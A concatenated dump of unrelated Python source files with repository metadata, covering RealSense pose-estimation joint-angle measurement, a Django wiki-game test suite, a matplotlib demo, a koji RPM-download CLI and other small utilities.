if len(pose_entries[n]) == 0:
continue
pose_keypoints = np.ones((num_keypoints, 2), dtype=np.int32) * -1
for kpt_id in range(num_keypoints):
if pose_entries[n][kpt_id] != -1.0: # keypoint was found
pose_keypoints[kpt_id, 0] = int(all_keypoints[int(pose_entries[n][kpt_id]), 0])
pose_keypoints[kpt_id, 1] = int(all_keypoints[int(pose_entries[n][kpt_id]), 1])
pose = Pose(pose_keypoints, pose_entries[n][24]) #TODO:这里原来是18,不知道是用于什么
current_poses.append(pose) # 存储不同人体的pose信息
if track:
track_poses(previous_poses, current_poses, smooth=smooth)
previous_poses = current_poses
for pose in current_poses:
pose.draw(img)
for idx, pair in enumerate(KPTS_ANGLE_PAIRS): # 对肘、膝关节进行关节角度测量
joint_forward = (pose.keypoints[pair[0]][1], pose.keypoints[pair[0]][0])
joint = (pose.keypoints[pair[1]][1], pose.keypoints[pair[1]][0])
joint_backward = (pose.keypoints[pair[2]][1], pose.keypoints[pair[2]][0])
if joint[0]*joint[1] > -1:
if joint_forward[0]*joint_forward[1] > 1 and joint_backward[0]*joint_backward[1] > 1:
joint_forward_depth = depth_img[joint_forward[0], joint_forward[1]] * 0.001
joint_depth = depth_img[joint[0], joint[1]] * 0.001
joint_backward_depth = depth_img[joint_backward[0], joint_backward[1]] * 0.001
if joint_backward_depth * joint_depth * joint_forward_depth > 0:
joint_forward_location = ( - (joint_forward[0] - camera_px) * joint_forward_depth / camera_fx, - (joint_forward[1] - camera_py) * joint_forward_depth / camera_fy, joint_forward_depth)
joint_location = ( - (joint[0] - camera_px) * joint_depth / camera_fx, - (joint[1] - camera_py) * joint_depth / camera_fy, joint_depth)
joint_backward_location = ( - (joint_backward[0] - camera_px) * joint_backward_depth / camera_fx, - (joint_backward[1] - camera_py) * joint_backward_depth / camera_fy, joint_backward_depth)
joint_angle = cal_joint_angle(joint_forward_location, joint_location, joint_backward_location)
keypoint_angel[idx] = joint_angle #获得关节角度
# cv2.rectangle(img, (joint[1], joint[0]), (joint[1]+45, joint[0]-12), (255,255,255), thickness=-1)
# cv2.putText(img, '%.1f'%joint_angle+'', (joint[1], joint[0]), cv2.FONT_HERSHEY_COMPLEX, 0.5, (0, 0, 0), thickness=1)
# else:
# cv2.rectangle(img, (joint[1], joint[0]), (joint[1]+45, joint[0]-12), (255,255,255), thickness=-1)
# cv2.putText(img, 'Null', (joint[1], joint[0]), cv2.FONT_HERSHEY_COMPLEX, 0.5, (0, 0, 0), thickness=1)
for pose in current_poses:
cv2.rectangle(img, (pose.bbox[0], pose.bbox[1]),
(pose.bbox[0] + pose.bbox[2], pose.bbox[1] + pose.bbox[3]), (0, 255, 0))
if track:
cv2.putText(img, 'human pose: {}'.format(pose.id), (pose.bbox[0], pose.bbox[1] - 16),
cv2.FONT_HERSHEY_COMPLEX, 0.5, (0, 0, 255))
return keypoint_angel, img
def cal_joint_angle(point1, point2, point3):
    """Return the angle in degrees at point2 formed by point1-point2-point3.

    Each point is an (x, y, z) tuple (camera-space metres). Uses the law of
    cosines, b^2 = a^2 + c^2 - 2ac*cos(B), where B is the angle at the
    vertex point2 and b is the side opposite it.
    """
    a = math.dist(point2, point3)  # vertex -> point3
    b = math.dist(point1, point3)  # side opposite the measured angle
    c = math.dist(point1, point2)  # vertex -> point1
    cos_b = (b * b - a * a - c * c) / (-2 * a * c)
    # Clamp so floating-point rounding on nearly collinear joints cannot push
    # the value outside acos's [-1, 1] domain and raise a ValueError.
    cos_b = max(-1.0, min(1.0, cos_b))
    return math.degrees(math.acos(cos_b))
def kalman(keypoint_angle):
    """Smooth the six measured joint angles with a simple 1-D Kalman-style filter."""
    global kalman_kpt_old
    global Accumulated_Error
    smoothed = np.zeros(6, np.float32)
    for i in range(len(keypoint_angle)):
        # A zero reading far below the previous estimate is a lost detection:
        # fall back to the last filtered value instead of snapping to zero.
        if keypoint_angle[i] == 0 and kalman_kpt_old[i] - keypoint_angle[i] > 40:
            keypoint_angle[i] = kalman_kpt_old[i]
        # Large jumps are tracked by blending new and old readings
        # (golden-ratio weights); small jumps keep the old estimate as input.
        if abs(keypoint_angle[i] - kalman_kpt_old[i]) / SCOPE > 0.25:
            prediction = keypoint_angle[i] * 0.382 + kalman_kpt_old[i] * 0.618
        else:
            prediction = kalman_kpt_old[i]
        # Combined uncertainty of the previous estimate and process noise Q.
        prior_error = (Accumulated_Error[i] ** 2 + Q ** 2) ** (1 / 2)
        # Gain: how strongly the new measurement is trusted over the prediction
        # (R is the measurement-noise estimate for this round).
        gain = prior_error ** 2 / (prior_error ** 2 + R ** 2)
        smoothed[i] = prediction + gain * (keypoint_angle[i] - prediction)
        # Carry the reduced uncertainty and the new estimate to the next call.
        Accumulated_Error[i] = ((1 - gain) * prior_error ** 2) ** (1 / 2)
        kalman_kpt_old[i] = smoothed[i]
    return smoothed
class Window(QWidget):
    """Main application window: grabs aligned RealSense colour/depth frames,
    runs pose estimation, converts keypoints to joint angles, smooths them
    with the kalman() filter and live-plots six curves with pyqtgraph."""
    def __init__(self):
        super().__init__()
        # One pyqtgraph plot per tracked joint (right/left elbow, knee, foot),
        # each clamped to the physically meaningful 0-180 degree range.
        self.win = pq.GraphicsLayoutWidget(show=True)
        self.win.setWindowTitle('人体关节角度值')
        self.p1 = self.win.addPlot(title="右肘")
        self.p1.setRange(yRange = [0,180])
        self.p2 = self.win.addPlot(title="左肘")
        self.p2.setRange(yRange = [0,180])
        self.win.nextRow()
        self.p3 = self.win.addPlot(title="右膝")
        self.p3.setRange(yRange = [0,180])
        self.p4 = self.win.addPlot(title="左膝")
        self.p4.setRange(yRange = [0,180])
        self.win.nextRow()
        self.p5 = self.win.addPlot(title="右脚")
        self.p5.setRange(yRange = [0,180])
        self.p6 = self.win.addPlot(title="左脚")
        self.p6.setRange(yRange = [0,180])
        # Rolling history of the six joint angles; newest sample lives at [:, -1].
        self.keypoints_angel = np.zeros([6,1000],np.float32)
        # self.keypoint_angel_filtered = np.zeros(1000,np.float32)
        self.curve1 = self.p1.plot(self.keypoints_angel[0,:], name="mode1")
        # self.curve1_1 = self.p1.plot(self.keypoint_angel_filtered, name="mode1", pen='w')
        self.curve2 = self.p2.plot(self.keypoints_angel[1,:], name="mode1")
        self.curve3 = self.p3.plot(self.keypoints_angel[2,:], name="mode1")
        self.curve4 = self.p4.plot(self.keypoints_angel[3,:], name="mode1")
        self.curve5 = self.p5.plot(self.keypoints_angel[4,:], name="mode1")
        self.curve6 = self.p6.plot(self.keypoints_angel[5,:], name="mode1")
        # Set up the two timers
        self.timer = pq.QtCore.QTimer()
        self.timer_drow = pq.QtCore.QTimer()
        # Bind the timer signals to update_data (capture + estimate) and display
        self.timer.timeout.connect(self.update_data)
        self.timer_drow.timeout.connect(self.display)
        # Timer intervals: capture every 50 ms, redraw the camera view every 100 ms
        self.timer.start(50)
        self.timer_drow.start(100)
        # Camera initialisation: 640x480 depth and colour streams at 30 fps,
        # with depth frames aligned onto the colour frames.
        self.pipeline = rs.pipeline()
        self.config = rs.config()
        self.config.enable_stream(rs.stream.depth, 640, 480, rs.format.z16, 30)
        self.config.enable_stream(rs.stream.color, 640, 480, rs.format.bgr8, 30)
        self.align = rs.align(rs.stream.color)
        self.pipeline.start(self.config)
        # Load the pose-estimation network and its checkpoint on the CPU
        self.net = PoseEstimationWithMobileNet()
        self.checkpoint_path = 'checkpoint_iter_33000.pth'
        self.checkpoint = torch.load(self.checkpoint_path, map_location='cpu')
        load_state(self.net, self.checkpoint)
    # Shift the angle history one slot to the left and append the newest sample.
    def update_data(self):
        frames = self.pipeline.wait_for_frames()
        aligned_frames = self.align.process(frames)
        depth_frame = aligned_frames.get_depth_frame()
        color_frame = aligned_frames.get_color_frame()
        color_image = np.asanyarray(color_frame.get_data())
        depth_image = np.asanyarray(depth_frame.get_data())
        self.keypoints_angel[:,:-1] = self.keypoints_angel[:,1:]
        # self.keypoint_angel_filtered[:-1] = self.keypoint_angel_filtered[1:]
        keypoints_angel, self.img = pose_estimate(self.net, color_image, depth_image, height_size=256, cpu=0, track=1, smooth=1)
        # Kalman-filter every joint angle before storing it
        keypoints_angel_filtered = kalman(keypoints_angel)
        for i in range(len(keypoints_angel_filtered)):
            self.keypoints_angel[i,-1] = keypoints_angel_filtered[i]
            # self.keypoints_angel[i,-1] = keypoints_angel[i]
        # Push the updated history into the plotted curves
        self.curve1.setData(self.keypoints_angel[0,:])
        # self.curve1_1.setData(self.keypoint_angel_filtered)
        self.curve2.setData(self.keypoints_angel[1,:])
        self.curve3.setData(self.keypoints_angel[2,:])
        self.curve4.setData(self.keypoints_angel[3,:])
        self.curve5.setData(self.keypoints_angel[4,:])
        self.curve6.setData(self.keypoints_angel[5,:])
    def display(self):
        # Show the annotated camera frame most recently produced by update_data.
        cv2.waitKey(1)
        cv2.imshow('Rehabilitation Action Assessment', self.img)
        # np.savetxt('data.csv', self.keypoints_angel, delimiter = ',')
    def __del__(self):
        # Release the OpenCV windows and stop the RealSense pipeline.
        cv2.destroyAllWindows()
        self.pipeline.stop()
if __name__ == '__main__':
    import sys
    # Standard PyQt5 boilerplate: create the application object.
    app = QApplication(sys.argv)
    # Instantiate the window that owns the plots, the camera and the network.
    window = Window()
    # window.show() #TODO: showing this widget opened an extra blank window, so it stays hidden
    # Standard PyQt5 boilerplate: run the event loop until the application exits.
    sys.exit(app.exec())
6b7ea80d74bd122a5019eb14a389e7445ba04672 | 532 | py | Python | Exercicio41a50/ex041.py | ItamarHavenstein/Python | fe536302aea00a4a898e0f54f5b9fa6aba3301cb | [
"MIT"
] | null | null | null | Exercicio41a50/ex041.py | ItamarHavenstein/Python | fe536302aea00a4a898e0f54f5b9fa6aba3301cb | [
"MIT"
] | null | null | null | Exercicio41a50/ex041.py | ItamarHavenstein/Python | fe536302aea00a4a898e0f54f5b9fa6aba3301cb | [
"MIT"
] | null | null | null | import datetime
# Read the athlete's birth year and print the competition category for their age.
nascimento = int(input('Digite seu ano de nascimento: '))
anoAtual = datetime.date.today().year
idade = anoAtual - nascimento
print('A idade do atleta é {}'.format(idade))
# Each elif already implies the lower bound from the branch above it, so the
# redundant "idade > N and" guards were removed; only upper bounds are tested.
if idade <= 9:
    print('A categoria do atleta é MIRIM')
elif idade <= 14:
    print('A categoria do atleta é INFANTIL')
elif idade <= 19:
    print('A categoria do atleta é JUNIOR')
elif idade <= 25:
    print('A categoria do atleta é SÊNIOR')
else:
    print('A categoria do atleta é MASTER')
| 26.6 | 57 | 0.684211 | import datetime
nascimento = int(input('Digite seu ano de nascimento: '))
anoAtual = datetime.date.today().year
idade = anoAtual - nascimento
print('A idade do atleta é {}'.format(idade))
if idade <= 9:
print('A categoria do atleta é MIRIM')
elif idade > 9 and idade <= 14:
print('A categoria do atleta é INFANTIL')
elif idade > 14 and idade <= 19:
print('A categoria do atleta é JUNIOR')
elif idade > 19 and idade <= 25:
print('A categoria do atleta é SÊNIOR')
else:
print('A categoria do atleta é MASTER')
| 0 | 0 | 0 |
c570c4bbc8d1f3c0e2b8593b955f43f6512aace4 | 1,731 | py | Python | wikigame/test_csv_data_extracter.py | danieldourado/camara-mirim-crawler | a00476a6b85acd788265f1be05e5c4dff7c63226 | [
"MIT"
] | null | null | null | wikigame/test_csv_data_extracter.py | danieldourado/camara-mirim-crawler | a00476a6b85acd788265f1be05e5c4dff7c63226 | [
"MIT"
] | 21 | 2019-12-26T16:41:19.000Z | 2022-03-21T22:16:22.000Z | wikigame/test_csv_data_extracter.py | danieldourado/plenarinho-util | a00476a6b85acd788265f1be05e5c4dff7c63226 | [
"MIT"
] | null | null | null | from django.test import TestCase
from .models import WikiGame, WikiTermos
from .csv_data_extracter import extract_data_from_csv, save_termos, save_wikigame, extract_termos_from_string, refresh_wikigame_model | 45.552632 | 163 | 0.671288 | from django.test import TestCase
from .models import WikiGame, WikiTermos
from .csv_data_extracter import extract_data_from_csv, save_termos, save_wikigame, extract_termos_from_string, refresh_wikigame_model
class CSVDETestCase(TestCase):
    """Integration tests for the CSV extraction helpers and the WikiGame /
    WikiTermos persistence routines."""
    mockup = {}

    def setUp(self):
        # Four interlinked terms; "out_links" uses the *alias[target] syntax.
        self.mockup = [
            {"termo":"cidadão","texto":"texto1 estados candidatos","out_links":"*estados[estado]*Poder Legislativo *candidatos[candidato]","imagem":"imagem_0001"},
            {"termo":"estado","texto":"texto1 cidadãos","out_links":"*cidadãos[cidadão]","imagem":"imagem_0002"},
            {"termo":"candidato","texto":"texto1 cidadãos","out_links":"*Poder Legislativo","imagem":"imagem_0003"},
            {"termo":"Poder Legislativo","texto":"texto1 cidadãos","out_links":"*cidadãos[cidadão]","imagem":"imagem_0004"}]

    def test_extract_data_from_csv(self):
        # The bundled CSV should yield a non-empty result.
        extracted = extract_data_from_csv()
        self.assertTrue(extracted)

    def test_save_termos(self):
        # Persisting the mockup creates exactly one WikiTermos row per entry.
        save_termos(self.mockup)
        print("Termos salvos:")
        for saved_termo in WikiTermos.objects.all():
            print(saved_termo.name)
        self.assertEqual(WikiTermos.objects.all().count(), len(self.mockup))

    def test_extract_termos_from_string(self):
        # The first mockup entry links to three known terms.
        save_termos(self.mockup)
        extracted_termos = extract_termos_from_string(self.mockup[0]['out_links'])
        self.assertEqual(len(extracted_termos), 3)

    def test_save_wikigame(self):
        # Terms must exist before the game rows referencing them are stored.
        save_termos(self.mockup)
        save_wikigame(self.mockup)
        self.assertEqual(WikiGame.objects.all().count(), len(self.mockup))

    def test_refresh_wikigame_model(self):
        # A refresh should leave the WikiGame table populated.
        refresh_wikigame_model()
        self.assertTrue(WikiGame.objects.all().count() != 0)
b46218f0c0260e786fb670c6e75ded1567d9cbcd | 1,160 | py | Python | Learning Unittests/matplotlib-tutorial-master/scripts/rain-static.py | BethWIntera/Beths_PySandbox | 6fb1d41353d29be4f7142c722cce8ec9872863e4 | [
"TCL",
"SWL",
"MIT",
"X11",
"BSD-3-Clause"
] | 6 | 2019-10-22T19:45:51.000Z | 2022-02-13T11:11:37.000Z | resources/Rougier Tutorial/scripts/rain-static.py | nstarman/2019-10-22-dotAstronomy-Plotting-Workshop | 31e1a10b3d0f051a2cd197ce390bcf96753f153c | [
"MIT"
] | 5 | 2019-11-15T02:00:26.000Z | 2021-01-06T04:26:40.000Z | resources/Rougier Tutorial/scripts/rain-static.py | nstarman/2019-10-22-dotAstronomy-Plotting-Workshop | 31e1a10b3d0f051a2cd197ce390bcf96753f153c | [
"MIT"
] | null | null | null | # -----------------------------------------------------------------------------
# Copyright (c) 2015, Nicolas P. Rougier. All Rights Reserved.
# Distributed under the (new) BSD License. See LICENSE.txt for more info.
# -----------------------------------------------------------------------------
import numpy as np
import matplotlib.pyplot as plt
# White 6x6-inch figure whose single axes fills the whole canvas at a 1:1 aspect ratio
fig = plt.figure(figsize=(6,6), facecolor='white')
ax = fig.add_axes([0.005,0.005,.99,.99], frameon=True, aspect=1)

# Ring count and the range of marker sizes (in points^2)
num_rings = 50
size_min = 50
size_max = 50*50

# Random ring centres inside the unit square
P = np.random.uniform(0,1,(num_rings,2))

# All rings are black; the alpha channel fades linearly from transparent to opaque
C = np.ones((num_rings,4)) * (0,0,0,1)
C[:,3] = np.linspace(0,1,num_rings)

# Ring sizes grow linearly alongside their opacity
S = np.linspace(size_min, size_max, num_rings)

# Draw hollow circles: coloured edges only, no face fill
scat = ax.scatter(P[:,0], P[:,1], s=S, lw = 0.5,
                  edgecolors = C, facecolors='None')

# Clamp both axes to [0,1] and hide the tick marks
ax.set_xlim(0,1), ax.set_xticks([])
ax.set_ylim(0,1), ax.set_yticks([])
# plt.savefig("../figures/rain-static.png",dpi=72)
plt.show()
| 28.292683 | 79 | 0.57069 | # -----------------------------------------------------------------------------
# Copyright (c) 2015, Nicolas P. Rougier. All Rights Reserved.
# Distributed under the (new) BSD License. See LICENSE.txt for more info.
# -----------------------------------------------------------------------------
import numpy as np
import matplotlib.pyplot as plt
# New figure with white background
fig = plt.figure(figsize=(6,6), facecolor='white')
# New axis over the whole figureand a 1:1 aspect ratio
ax = fig.add_axes([0.005,0.005,.99,.99], frameon=True, aspect=1)
# Number of ring
n = 50
size_min = 50
size_max = 50*50
# Ring position
P = np.random.uniform(0,1,(n,2))
# Ring colors
C = np.ones((n,4)) * (0,0,0,1)
# Alpha color channel goes from 0 (transparent) to 1 (opaque)
C[:,3] = np.linspace(0,1,n)
# Ring sizes
S = np.linspace(size_min, size_max, n)
# Scatter plot
scat = ax.scatter(P[:,0], P[:,1], s=S, lw = 0.5,
edgecolors = C, facecolors='None')
# Ensure limits are [0,1] and remove ticks
ax.set_xlim(0,1), ax.set_xticks([])
ax.set_ylim(0,1), ax.set_yticks([])
# plt.savefig("../figures/rain-static.png",dpi=72)
plt.show()
| 0 | 0 | 0 |
76f9fcd8cbfb281fd98572b67802852dd900e5e0 | 328 | py | Python | app/tests/test_main.py | BrianThomasRoss/ds-bw | e2dcb909d48cdbcb5918e16ae26b0d1a70c1c36c | [
"MIT"
] | null | null | null | app/tests/test_main.py | BrianThomasRoss/ds-bw | e2dcb909d48cdbcb5918e16ae26b0d1a70c1c36c | [
"MIT"
] | null | null | null | app/tests/test_main.py | BrianThomasRoss/ds-bw | e2dcb909d48cdbcb5918e16ae26b0d1a70c1c36c | [
"MIT"
] | null | null | null | """Main application unittests."""
from fastapi.testclient import TestClient
from app.main import app
client = TestClient(app)
def test_docs():
    """The root route should serve the HTML documentation page."""
    resp = client.get('/')
    assert resp.status_code == 200
    assert resp.headers['content-type'].startswith('text/html')
| 23.428571 | 67 | 0.710366 | """Main application unittests."""
from fastapi.testclient import TestClient
from app.main import app
client = TestClient(app)
def test_docs():
"""Return HTML docs for root route."""
response = client.get('/')
assert response.status_code == 200
assert response.headers['content-type'].startswith('text/html')
| 0 | 0 | 0 |
7da5914781a84876cf010359d3fd910b3fd35a8f | 189 | py | Python | data_collection/gazette/spiders/sc_saltinho.py | Jefersonalves/diario-oficial | 9a4bdfe2e31414c993d88831a67160c49a5ee657 | [
"MIT"
] | 3 | 2021-08-18T17:50:31.000Z | 2021-11-12T23:36:33.000Z | data_collection/gazette/spiders/sc_saltinho.py | Jefersonalves/diario-oficial | 9a4bdfe2e31414c993d88831a67160c49a5ee657 | [
"MIT"
] | 4 | 2021-02-10T02:36:48.000Z | 2022-03-02T14:55:34.000Z | data_collection/gazette/spiders/sc_saltinho.py | Jefersonalves/diario-oficial | 9a4bdfe2e31414c993d88831a67160c49a5ee657 | [
"MIT"
] | null | null | null | from gazette.spiders.base import FecamGazetteSpider
| 23.625 | 51 | 0.767196 | from gazette.spiders.base import FecamGazetteSpider
class ScSaltinhoSpider(FecamGazetteSpider):
    """Gazette spider for the municipality of Saltinho ("sc_" presumably
    Santa Catarina); all scraping logic lives in FecamGazetteSpider."""
    name = "sc_saltinho"  # unique spider identifier
    FECAM_QUERY = "cod_entidade:228"  # query selecting this municipality on the FECAM portal
    TERRITORY_ID = "4215356"  # municipality territory code (presumably the IBGE code - confirm)
| 0 | 113 | 23 |
e5daec4c060e5b408bdc03a6009a4ee4f7ac2cd8 | 3,340 | py | Python | services/Runner/externalServices/manager.py | muhammad-abbady/JenTab | df7b1450cb14e64edade30ea7de49d05a7d7dbf2 | [
"Apache-2.0"
] | 9 | 2021-03-23T11:32:40.000Z | 2022-03-31T13:58:41.000Z | services/Runner/externalServices/manager.py | muhammad-abbady/JenTab | df7b1450cb14e64edade30ea7de49d05a7d7dbf2 | [
"Apache-2.0"
] | null | null | null | services/Runner/externalServices/manager.py | muhammad-abbady/JenTab | df7b1450cb14e64edade30ea7de49d05a7d7dbf2 | [
"Apache-2.0"
] | 1 | 2021-04-29T21:27:08.000Z | 2021-04-29T21:27:08.000Z | import config
import json
import traceback
import requests
# maximum length of an error message to be stored
# excessive error messages might make it properly to the manager
MAX_ERROR_LENGTH = 2 * 1024 * 1024
# create an instance for export
Manager = Manager_Service()
| 33.069307 | 85 | 0.596407 | import config
import json
import traceback
import requests
# maximum length of an error message to be stored
# excessive error messages might make it properly to the manager
MAX_ERROR_LENGTH = 2 * 1024 * 1024
class Manager_Service():
    """HTTP client wrapping the manager node's REST API.

    Every request authenticates with HTTP Basic auth (credentials taken from
    ``config``) and identifies this worker through the ``client`` query
    parameter. The ``get_*`` methods return the decoded JSON payload or
    None; the ``store_*``/``audit_*`` methods return True on HTTP 200.
    """
    root = config.manager_url  # base URL of the manager node

    def _auth(self):
        """HTTP Basic auth credentials shared by every request."""
        return requests.auth.HTTPBasicAuth(config.USER_NAME, config.USER_PASSWORD)

    def get_work(self):
        """Retrieve a new work package from the manager node."""
        url = '{}/getWork'.format(self.root)
        resp = requests.post(
            url,
            params={'client': config.client_id},
            auth=self._auth(),
        )
        if resp.status_code == 200:
            return resp.json()
        else:
            return None

    def get_desc(self, year, round, table):
        """
        Retrieve the package specified from the manager node.
        This will not (!) assign the corresponding table to this client;
        only meant for debug use.
        """
        url = '{}/getDescription'.format(self.root)
        resp = requests.post(
            url,
            params={'year': year, 'round': round, 'table': table},
            auth=self._auth(),
        )
        if resp.status_code == 200:
            return resp.json()
        else:
            return None

    def store_result(self, table, result):
        """Store a result for the given table in the manager node."""
        url = '{}/storeResult/{}/'.format(self.root, table)
        resp = requests.put(
            url,
            params={'client': config.client_id},
            data=json.dumps(result),
            auth=self._auth(),
        )
        return resp.status_code == 200

    def store_error(self, table, errors=None):
        """Store the last error for the given table in the manager node.

        NOTE(review): ``errors`` is unused; kept for backward compatibility
        with existing callers.
        """
        url = '{}/storeError/{}/'.format(self.root, table)
        # get error content from the exception currently being handled
        trace = traceback.format_exc()
        # cut the message at a maximum length so excessive tracebacks
        # still make it to the manager intact
        if len(trace) > MAX_ERROR_LENGTH:
            trace = trace[-MAX_ERROR_LENGTH:]
        # submit the error
        resp = requests.put(
            url,
            params={'client': config.client_id},
            data=trace.encode('utf-8'),
            auth=self._auth(),
        )
        return resp.status_code == 200

    def store_analysisData(self, table, data):
        """Store analysis data in the manager node."""
        url = '{}/storeAnalysisData/{}/'.format(self.root, table)
        resp = requests.put(
            url,
            params={'client': config.client_id},
            data=json.dumps(data),
            auth=self._auth(),
        )
        return resp.status_code == 200

    def audit_lst(self, records):
        """Submit a list of audit records to the manager node.

        (Docstring fixed: it was a copy-paste of get_work's docstring.)
        """
        url = '{}/audit_lst'.format(self.root)
        resp = requests.post(
            url,
            params={'client': config.client_id},
            data=json.dumps(records),
            auth=self._auth(),
        )
        return resp.status_code == 200
# create an instance for export
Manager = Manager_Service()
| 0 | 3,044 | 23 |
bdf7197d3017603e7d978b7cd8b575326cdce351 | 2,400 | py | Python | bld2repo/bld2repo/cli.py | ppisar/modulemd-tools | 1296439248e14fe3b2e17a2141975e68d3dc9be1 | [
"MIT"
] | 23 | 2020-07-26T14:49:46.000Z | 2022-03-30T03:38:41.000Z | bld2repo/bld2repo/cli.py | ppisar/modulemd-tools | 1296439248e14fe3b2e17a2141975e68d3dc9be1 | [
"MIT"
] | 44 | 2020-06-25T12:59:51.000Z | 2022-03-31T11:45:31.000Z | bld2repo/bld2repo/cli.py | ppisar/modulemd-tools | 1296439248e14fe3b2e17a2141975e68d3dc9be1 | [
"MIT"
] | 13 | 2020-06-25T12:53:16.000Z | 2021-09-06T06:25:54.000Z | import argparse
import os
from bld2repo import (get_buildrequire_pkgs_from_build, add_rpm_urls, rpm_bulk_download,
create_repo)
from bld2repo.config import Config
from bld2repo.utils import get_koji_session
if __name__ == "__main__":
main()
| 40.677966 | 98 | 0.642083 | import argparse
import os
from bld2repo import (get_buildrequire_pkgs_from_build, add_rpm_urls, rpm_bulk_download,
create_repo)
from bld2repo.config import Config
from bld2repo.utils import get_koji_session
def get_arg_parser():
    """Build and return the command-line argument parser for bld2repo.

    Defaults appear in the generated ``--help`` output because the parser
    uses ArgumentDefaultsHelpFormatter.
    """
    # Trailing space added: the implicit string concatenation previously
    # produced "RPMsof a modular" in the --help output.
    description = (
        "When provided with a build id it will download all buildrequired RPMs "
        "of a modular koji build into the provided directory and create a repository out of it."
    )
    parser = argparse.ArgumentParser("bld2repo", description=description,
                                     formatter_class=argparse.ArgumentDefaultsHelpFormatter)
    parser.add_argument("-b", "--build-id", required=True, type=int, help="ID of a koji build.")
    parser.add_argument("-d", "--result-dir", help="Directory where the RPMs are downloaded.",
                        default=".", type=str)
    parser.add_argument("-a", "--arch", help=("For which architecture the RPMs should be download"
                                              "ed. The 'noarch' is included automatically."),
                        default="x86_64", type=str)
    parser.add_argument("-k", "--koji-host", type=str,
                        default="https://koji.fedoraproject.org/kojihub",
                        help="Koji host base url")
    # "storage storage" duplicated-word typo fixed in the help text.
    parser.add_argument("-s", "--koji-storage-host", type=str,
                        default="https://kojipkgs.fedoraproject.org",
                        help=("Koji storage host base url. Server where the RPMs are "
                              "stored. Required to be used together with `--koji-host`."))
    return parser
def main():
    """CLI entry point: download all buildrequired RPMs of the given koji
    build into the result directory and turn it into a repository."""
    parser = get_arg_parser()
    args = parser.parse_args()
    # A custom --koji-host only makes sense together with a matching custom
    # --koji-storage-host; reject the former without the latter.
    koji_host_dflt = parser.get_default("koji_host")
    if args.koji_host != koji_host_dflt:
        koji_storage_dflt = parser.get_default("koji_storage_host")
        if args.koji_storage_host == koji_storage_dflt:
            # Error-message typo fixed ("used to together" -> "used together").
            parser.error("--koji-host and --koji-storage-host need to be used together.")
    config = Config(args.koji_host, args.koji_storage_host, args.arch, args.result_dir)
    session = get_koji_session(config)
    # Resolve the build's buildrequires, attach download URLs, fetch the RPMs
    # and finally create the repository metadata in the result directory.
    pkgs = get_buildrequire_pkgs_from_build(args.build_id, session, config)
    pkgs, rpm_num = add_rpm_urls(pkgs, config)
    rpm_bulk_download(pkgs, rpm_num, config.result_dir)
    create_repo(config.result_dir)
# Run the CLI when the module is executed directly.
if __name__ == "__main__":
    main()
| 2,081 | 0 | 46 |
5eba01cc06175f5868b76bf826bf0d4381e28d47 | 1,101 | py | Python | sandbox/finetuning/envs/mujoco/gather/swimmer_gather_unevenfloor_env.py | andrewli77/rllab-finetuning | 2dae9141d0fdc284d04f18931907131d66b43023 | [
"MIT"
] | 23 | 2020-04-27T23:53:44.000Z | 2022-03-10T03:13:16.000Z | sandbox/finetuning/envs/mujoco/gather/swimmer_gather_unevenfloor_env.py | WeiChengTseng/rllab-finetuning | 2dae9141d0fdc284d04f18931907131d66b43023 | [
"MIT"
] | 1 | 2021-11-14T13:30:22.000Z | 2021-11-14T13:30:22.000Z | sandbox/finetuning/envs/mujoco/gather/swimmer_gather_unevenfloor_env.py | WeiChengTseng/rllab-finetuning | 2dae9141d0fdc284d04f18931907131d66b43023 | [
"MIT"
] | 8 | 2020-06-17T03:28:34.000Z | 2022-03-09T03:13:03.000Z | from rllab.envs.mujoco.gather.gather_env import GatherEnv
from sandbox.finetuning.envs.mujoco.swimmer_unevenfloor_env import SwimmerUnevenFloorEnv
if __name__ == "__main__":
env = SwimmerGatherUnevenFloorEnv()
while True:
env.reset()
for _ in range(1000):
env.render()
_, reward, _, _ = env.step(env.action_space.sample()) # take a random action
# env.reset()
# frames = []
# for i in range(5):
# print(i)
# frames.append(env.render(mode='rgb_array'))
# _, reward, _, _ = env.step(env.action_space.sample()) # take a random action
#
# import skvideo.io
# import numpy as np
# output_data = np.array(frames)
# import IPython; IPython.embed()
# output_data = output_data.astype(np.uint8)
# import os.path as osp
# import rllab.config as config
#
# output_path = osp.join(config.PROJECT_PATH, "data/local/outputvideo.mp4")
# skvideo.io.vwrite(output_path, output_data) | 33.363636 | 89 | 0.660309 | from rllab.envs.mujoco.gather.gather_env import GatherEnv
from sandbox.finetuning.envs.mujoco.swimmer_unevenfloor_env import SwimmerUnevenFloorEnv
class SwimmerGatherUnevenFloorEnv(GatherEnv):
    """Gather task whose agent is a swimmer moving over an uneven floor.

    GatherEnv builds the underlying simulation from MODEL_CLASS; ORI_IND is
    presumably the index of the agent's orientation coordinate in the state
    vector - confirm against GatherEnv's usage.
    """
    MODEL_CLASS = SwimmerUnevenFloorEnv
    ORI_IND = 2
if __name__ == "__main__":
    # Manual smoke test: run the environment forever with random actions,
    # rendering every step; each episode lasts 1000 steps before a reset.
    env = SwimmerGatherUnevenFloorEnv()
    while True:
        env.reset()
        for _ in range(1000):
            env.render()
            _, reward, _, _ = env.step(env.action_space.sample())  # take a random action
    # env.reset()
    # frames = []
    # for i in range(5):
    #     print(i)
    #     frames.append(env.render(mode='rgb_array'))
    #     _, reward, _, _ = env.step(env.action_space.sample())  # take a random action
    #
    # import skvideo.io
    # import numpy as np
    # output_data = np.array(frames)
    # import IPython; IPython.embed()
    # output_data = output_data.astype(np.uint8)
    # import os.path as osp
    # import rllab.config as config
    #
    # output_path = osp.join(config.PROJECT_PATH, "data/local/outputvideo.mp4")
    # skvideo.io.vwrite(output_path, output_data)
f044b60a0ff24131432e7e5141763c3749fa4897 | 210 | py | Python | django_easy_ajax/urls.py | ApptecSrl/django-easy-ajax | 4931ab1aa51564bfda7328665cb5b078b6f5b132 | [
"BSD-3-Clause"
] | null | null | null | django_easy_ajax/urls.py | ApptecSrl/django-easy-ajax | 4931ab1aa51564bfda7328665cb5b078b6f5b132 | [
"BSD-3-Clause"
] | null | null | null | django_easy_ajax/urls.py | ApptecSrl/django-easy-ajax | 4931ab1aa51564bfda7328665cb5b078b6f5b132 | [
"BSD-3-Clause"
] | null | null | null | from django.conf.urls import url
from . import views
# Single route: /<strategy_name>/<pk>/ dispatches to AjaxBaseSerializedView
# and is reversible under the name 'django-easy-ajax-selector'.
urlpatterns = [
    url(r'^(?P<strategy_name>[-\w]+)/(?P<pk>\d+)/$', views.AjaxBaseSerializedView.as_view(),
        name='django-easy-ajax-selector'),
]
| 21 | 92 | 0.647619 | from django.conf.urls import url
from . import views
urlpatterns = [
